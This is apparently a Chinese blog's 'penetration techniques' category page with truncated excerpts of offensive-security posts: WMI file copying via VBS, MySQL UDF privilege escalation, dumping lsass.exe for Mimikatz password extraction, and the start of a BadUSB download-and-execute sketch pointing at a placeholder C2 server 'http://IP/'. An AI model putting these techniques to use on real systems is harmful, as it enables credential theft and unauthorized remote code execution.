渗透技巧
关注
分享
扫一扫
文章平均质量分 92
FFE4
业余病毒分析
展开
-
高级渗透之VBS调用WMI接口
vbs调用WMI接口复制文件:Set objWMIService = GetObject("winmgmts://./root/CIMV2")Set colFiles = objWMIService.ExecQuery("SELECT * FROM CIM_DataFIle Where Name='c:\\target\\Flag.dat'")For Each objFile In ColF...原创 2019-04-15 23:32:43 · 2643 阅读 · 1 评论 -
Ubuntu18.04TLS安装Metasploit
使用官方提供的一件安装脚本安装msf,安装时提示msf源仓库里的key验证失败,导致更新不了源一键安装命令是这样的:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ms...原创 2019-04-28 15:47:21 · 2727 阅读 · 0 评论 -
UDF提权 mysql插件学习笔记
以前看过一篇老外的文章讲mysql udf提权原理,这篇文章中针对kali自带的mysql 提权udf.dll进行了解释,但是并没有介绍如何编写一个标准的udf扩展。后来有个朋友托我帮他改下udf.dll,把其他功能去掉,只留下cmd_shell这个命令执行的功能开始我以为随便写个dll,然后导出个函数,就可以用mysql加载并调用了。原来需要按照mysql手册指定的格式去编写,其中必须用到...原创 2019-04-24 17:04:01 · 453 阅读 · 0 评论 -
从dump文件中读取开机密码
通过vbs脚本创建lsass.exe进程dump文件,使用Mimikatz从dump文件中读取电脑密码!使用方法:cscript.exe test.vbs lsass.exe脚本代码:Option ExplicitConst SW_HIDE = 0If (WScript.Arguments.Count <> 1) Then WScript.StdOut.Writ...原创 2019-08-31 22:41:42 · 1360 阅读 · 0 评论 -
BadUSB橡皮鸭Win&Linux通用下载者
TB上买橡皮鸭USB开发板,也叫BadUSB,二三十块钱一个,可以通过简单编程将逻辑刷入USB固件中,插入电脑的时候,模拟键盘按键,自动执行特定逻辑。下面是我写的一个兼容Windows和Linux的键盘按键,完成远程下载执行的功能,#include <Keyboard.h>// C2 Server String szURL = "http://IP/";void win(...原创 2019-09-16 19:57:25 · 1094 阅读 · 0 评论